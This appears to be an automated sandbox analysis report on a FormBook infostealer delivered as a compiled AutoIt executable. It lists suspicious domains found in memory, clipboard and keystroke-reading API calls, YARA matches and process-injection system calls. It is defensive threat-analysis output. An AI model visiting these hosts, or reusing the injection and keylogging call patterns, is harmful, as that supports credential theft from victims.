Source: newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/Chat/943a999047.html
Source: newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/Chat/9c599985.html
Source: newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/aiyinmaliya/
Source: newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/beitiaomafei/
Source: CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/boduoyejieyi/
Source: CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/caimeixunguoz/
Source: CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/cangjingkong/
Source: newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/daqiaoweijiu/
Source: CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/dongyuefeng/
Source: newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/ee0m/
Source: newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/fengjianyoumei/
Source: newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/gaoqiaoshengzi/
Source: newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/gongdilan/
Source: newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/jingxiangJULIA/
Source: newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/jinmeixiang/
Source: newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/jizemingbuf/
Source: newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/kuisi/
Source: CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/lingcunailid/
Source: newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/lingmuxinchun/
Source: newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/longzeluola/
Source: newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/macangyou/
Source: newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/micangsuixiang/
Source: CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/mingrihuaqiluo/
Source: CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/qiaobenliang/
Source: newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/ruocainaiyang/
Source: newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/sanshangyouya/
Source: newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/sanshangyouyak/
Source: CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/shananfenghua/
Source: CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/shangyuanruisui/
Source: newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/shenchuanling/
Source: newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/shiyinnailan/
Source: newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/shuiximeili/
Source: CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/shuiyechaoyang/
Source: newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/shuiyechaoyangh/
Source: newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/sitemap.xml
Source: CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/taoguhuilixiangx/
Source: newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/template/news/newsblue/css/base.css
Source: newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/template/news/newsblue/css/common.css
Source: newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/xiaodaonan/
Source: newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/xiaotianyou/
Source: CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/xiaoxiyou/
Source: newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/xiaozaochuanlianzi/
Source: CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/xidaoaili/
Source: newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/xidaoailiw/
Source: newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/xingyenamei/
Source: newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/xiqijiexika/
Source: newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/yingjingliya/
Source: newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/yingmulin/
Source: CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/youtianzhenxi/
Source: newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/youyuanbumei/
Source: CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.8686206.xyz/yuantianmeiying/
Source: CsyVZPSRWzlUG.exe, 00000009.00000002.4049320310.00000000008C4000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.growbamboo.xyz
Source: CsyVZPSRWzlUG.exe, 00000009.00000002.4049320310.00000000008C4000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.growbamboo.xyz/e948/
Source: newdev.exe, 00000008.00000002.4051240751.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.0000000002D64000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.3270029445.00000000014B4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.litespeedtech.com/error-page
Source: newdev.exe, 00000008.00000002.4053807355.0000000007A08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: newdev.exe, 00000008.00000002.4053807355.0000000007A08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: newdev.exe, 00000008.00000002.4053807355.0000000007A08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: newdev.exe, 00000008.00000002.4053807355.0000000007A08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: newdev.exe, 00000008.00000002.4053807355.0000000007A08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: newdev.exe, 00000008.00000002.4053807355.0000000007A08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: newdev.exe, 00000008.00000002.4053807355.0000000007A08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: newdev.exe, 00000008.00000002.4049026110.00000000009DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: newdev.exe, 00000008.00000002.4049026110.00000000009B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: newdev.exe, 00000008.00000003.3160353590.00000000079E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: newdev.exe, 00000008.00000002.4049026110.00000000009B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
Source: newdev.exe, 00000008.00000002.4049026110.00000000009B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: newdev.exe, 00000008.00000002.4049026110.00000000009B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: newdev.exe, 00000008.00000002.4049026110.00000000009B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: newdev.exe, 00000008.00000002.4049026110.00000000009B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: newdev.exe, 00000008.00000002.4053807355.0000000007A08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: newdev.exe, 00000008.00000002.4051240751.000000000582C000.00000004.10000000.00040000.00000000.sdmp, newdev.exe, 00000008.00000002.4053567818.0000000007720000.00000004.00000800.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050870275.00000000033AC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://ziyuan.baidu.com/image.gif

Source: C:\Users\user\Desktop\25IvlOVEB1.exe

Code function: 0_2_000E4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_000E4164

Source: C:\Users\user\Desktop\25IvlOVEB1.exe

Code function: 0_2_000E4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_000E4164

Source: C:\Users\user\Desktop\25IvlOVEB1.exe

Code function: 0_2_000E3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_000E3F66

Source: C:\Users\user\Desktop\25IvlOVEB1.exe

Code function: 0_2_000D001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_000D001C

Source: C:\Users\user\Desktop\25IvlOVEB1.exe

Code function: 0_2_000FCABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_000FCABC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.4049320310.0000000000870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4050165664.0000000004560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2966520608.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2968336091.00000000062B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4050217084.00000000045B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4048784369.0000000000890000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4050246258.0000000002610000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2967226346.0000000003E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00073B3A
Source: 25IvlOVEB1.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: 25IvlOVEB1.exe, 00000000.00000000.2167848636.0000000000124000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_1873f4db-8
Source: 25IvlOVEB1.exe, 00000000.00000000.2167848636.0000000000124000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_0f6ed540-6
Source: 25IvlOVEB1.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_52240fe2-0
Source: 25IvlOVEB1.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_689848b5-3

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042C743 NtClose,	2_2_0042C743
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72B60 NtClose,LdrInitializeThunk,	2_2_03B72B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03B72DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B735C0 NtCreateMutant,LdrInitializeThunk,	2_2_03B735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B74340 NtSetContextThread,	2_2_03B74340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B74650 NtSuspendThread,	2_2_03B74650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72BA0 NtEnumerateValueKey,	2_2_03B72BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72B80 NtQueryInformationFile,	2_2_03B72B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72BF0 NtAllocateVirtualMemory,	2_2_03B72BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72BE0 NtQueryValueKey,	2_2_03B72BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72AB0 NtWaitForSingleObject,	2_2_03B72AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72AF0 NtWriteFile,	2_2_03B72AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72AD0 NtReadFile,	2_2_03B72AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72FB0 NtResumeThread,	2_2_03B72FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72FA0 NtQuerySection,	2_2_03B72FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72F90 NtProtectVirtualMemory,	2_2_03B72F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72FE0 NtCreateFile,	2_2_03B72FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72F30 NtCreateSection,	2_2_03B72F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72F60 NtCreateProcessEx,	2_2_03B72F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72EA0 NtAdjustPrivilegesToken,	2_2_03B72EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72E80 NtReadVirtualMemory,	2_2_03B72E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72EE0 NtQueueApcThread,	2_2_03B72EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72E30 NtWriteVirtualMemory,	2_2_03B72E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72DB0 NtEnumerateKey,	2_2_03B72DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72DD0 NtDelayExecution,	2_2_03B72DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72D30 NtUnmapViewOfSection,	2_2_03B72D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72D10 NtMapViewOfSection,	2_2_03B72D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72D00 NtSetInformationFile,	2_2_03B72D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72CA0 NtQueryInformationToken,	2_2_03B72CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72CF0 NtOpenProcess,	2_2_03B72CF0
